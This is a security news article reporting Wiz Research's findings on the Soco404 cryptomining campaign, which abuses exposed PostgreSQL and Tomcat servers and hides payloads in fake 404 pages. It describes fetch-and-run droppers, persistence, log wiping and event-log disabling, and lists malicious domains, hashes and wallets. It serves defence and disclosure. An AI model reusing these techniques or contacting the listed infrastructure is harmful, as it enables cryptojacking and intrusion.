Beware of Fake Error Pages Deploying Platform-Specific Malware on Linux and Windows Systems

Beware of Fake Error Pages Deploying Platform-Specific Malware on Linux and Windows Systems

Wiz Research has uncovered an active cryptomining campaign, dubbed Soco404, that exploits misconfigurations in PostgreSQL databases and other cloud services to deploy platform-specific malware on both Linux and Windows systems.

This operation, part of a broader crypto-scam infrastructure, leverages opportunistic scanning for exposed services, abusing features like PostgreSQL’s COPY FROM PROGRAM for remote code execution (MITRE T1190).

Attackers target publicly accessible instances, which Wiz data indicates affect nearly one-third of self-hosted PostgreSQL deployments in cloud environments, representing a high-risk attack surface.

Attack flow

Exploitation of Cloud Misconfigurations

By infiltrating via weak credentials or vulnerabilities such as CVE-2025-24813 in Apache Tomcat, the threat actors host payloads on compromised legitimate servers, including a notable Korean transportation website, to distribute malware while evading detection.

The campaign employs process masquerading (MITRE T1036.005), disguising malicious binaries as legitimate system processes like sd-pam or kernel workers, and ensures persistence through cron jobs (MITRE T1053.003) and modifications to shell initialization files such as .bashrc and .profile (MITRE T1546.004).

Malware payloads are ingeniously embedded as base64-encoded blobs within fake 404 error pages hosted on Google Sites and custom domains, which display innocuous error messages but facilitate payload extraction and execution upon access.

Windows Systems
Fake 404 error page

In-Depth Technical Breakdown

In the Linux variant, attackers execute an in-memory dropper script, soco.sh, fetched via tools like curl or wget from compromised Apache Tomcat servers (MITRE T1105).

This script downloads a UPX-packed Go binary obfuscated with Garble (MITRE T1027), which unpacks in memory, spawns child processes communicating over local sockets (MITRE T1559), and connects to C2 domains like www.fastsoco.top for the main payload.

The binary eliminates competing miners by clearing ld.so.preload, killing rogue processes, and wiping logs (MITRE T1070.002), while optimizing system resources for mining if running as root, such as enabling huge pages and tweaking MSR registers for AMD or Intel CPUs.

Persistence is reinforced by cron entries and shell file injections, leading to cryptocurrency mining on pools like c3pool and moneroocean using specific wallet addresses.

For Windows, the payload ok.exe is delivered via certutil, PowerShell Invoke-WebRequest, or curl fallbacks, dropping to writable paths like C:UsersPublic.

It establishes persistence as a service (MITRE T1543.003) with random names, injects into conhost.exe (MITRE T1055), deploys the WinRing0.sys driver for resource access, and halts event logging (MITRE T1562.002) before initiating mining with the same wallets.

Evidence links Soco404 to crypto-scam sites like seeyoume.top, which mimic legitimate exchanges and embed similar payloads, suggesting a versatile operation blending cryptojacking with social engineering.

Wiz’s Dynamic Scanner identifies exposed PostgreSQL with weak credentials, while the Runtime Sensor detects anomalous behaviors from exploitation to mining (MITRE T1496). This campaign remains active, with dynamic worker counts in mining pools indicating ongoing infections.

Indicators of Compromise (IOCs)

Indicator Description
c9bb137d56fab7d52b3dbc85ae754b79d861a118bfb99566faaa342c978285ff SHA-256 soco.sh
bac4b166dec1df8aa823a15136c82c8b50960b11a0c4da68b8d7dedcb0f3a794 SHA-256 soco.sh
c67e876d7b3ae5f3c4fd626d8ba62e77bd47dfdf51f7a4438edd64bd0f88ce3a SHA-256 soco.sh
039caa15c1a54b49250717e68cd1a78a4be17b80e8062441c340eba0674e5926 SHA-256 of ldr.sh
0ad013c5166900b9c57a7ff771dbbf8b11f8a3be46a85cff6ced83ceb1a38f8d SHA-256 of ldr.sh
68bb9e294ba7f1b0426e16abbdb5c8f29daa8e8d98aee7a430ead97f2ffadd3a SHA-256 of ELF malware
8d06979a38ee5ef6f03817a1d16ab75171528cfaf8f743bfe64b45abd6c26142 SHA-256 of ok.exe Windows malware
https://sites.google.com/view/2025soco/ Payload hosting site
https://sites.google.com/view/dblikes Payload hosting site
https://sites.google.com/view/sogoto Payload hosting site
https://sites.google.com/view/osk05 Payload hosting site
www.fastsoco.top Payload hosting site
dblikes.cyou Payload hosting site
seeyoume.top Payload hosting site
arcticoins.com Crypto scam domain
diamondcapitalcrypro.com Crypto scam domain
nordicicoins.com Crypto scam domain
hkcapitals.com Crypto scam domain
auto.c3pool.org Mining pool
gulf.moneroocean.stream Mining pool
483F2xjkCUegxPM7wAexam1Be67EqDRZpS7azk8hcGETSustmuxd1Agffa3XSHFyzeFprLyHKm37bTPShFUTKgctMSBVuuK Attacker’s crypto wallet address
8BmVXbfsnRsiyPfUxsfnyyA9LqXvUsF2DYBX3wUmCEtejnBMyTiXe3XDCvq4REjmviEc5J1gomsnv7e4wYy1c5Pz3VadeyZ Attacker’s crypto wallet address

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!


Source link